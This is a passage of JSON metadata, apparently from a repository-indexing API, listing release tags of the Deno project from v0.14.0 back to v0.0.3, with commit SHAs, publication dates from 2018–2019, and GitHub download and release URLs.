v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3"